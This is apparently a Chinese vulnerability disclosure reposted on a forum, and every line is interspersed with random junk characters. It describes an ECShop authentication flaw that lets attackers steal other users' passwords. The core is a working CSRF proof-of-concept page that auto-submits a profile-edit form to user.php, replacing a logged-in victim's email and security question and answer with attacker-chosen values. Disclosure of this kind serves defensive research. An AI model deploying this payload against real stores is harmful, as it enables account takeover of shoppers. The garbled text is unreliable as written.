简要描述:0 ^( e8 u8 {; G5 F
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
& }9 i `( ?1 L+ H4 e$ R6 O
! @* I7 L& s/ nDemo For:http://www.wooyun.org/bug.php?action=view&id=395
: ?% v* j @% j( C, a5 r( `4 z ~+ i( K
详细说明:. j# p" A' j' [8 }" H0 K- d( {2 C9 k
利用csrf和xss可以突破官方所说的“障碍”* \! [/ t' u9 d/ Q$ P
xss版本已经有人说明
' B; J- n3 p, x8 L" c/ ]这里给出csrf版本
9 @8 k8 z* Z$ P0 l. c; p
3 j% c7 T2 d$ V9 S3 C7 ~0 h% V: W2 u漏洞证明:
( [: R" L9 j% W0 s<html>/ Q( D; [' U1 H+ ]9 D' x" C, Z. {
<body>
. x [4 C% \& @, S<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
- n2 F2 d7 G6 F1 c<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">2 I. ?& y) k; e3 T5 D- c
<INPUT TYPE="text" NAME="act" value="act_edit_profile">& R! m( H% Y% v) x1 g
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; E6 f) q! D: |& F( r+ `<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
8 A- m# ~) N1 y2 L</body>
) S$ _; |; N3 B' L<script>- Q2 }! h6 Q( C+ O
document.forms[0].submit();
$ `* `. b" _* w/ a5 I</script>: c% A! \, Q* v, ]( o7 ]( Y( c+ W
</html>
7 p1 H9 S r, }- k2 w构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失" z: C" ]0 D% v6 I
1 u" [2 q" V E+ Y& Z J$ f
|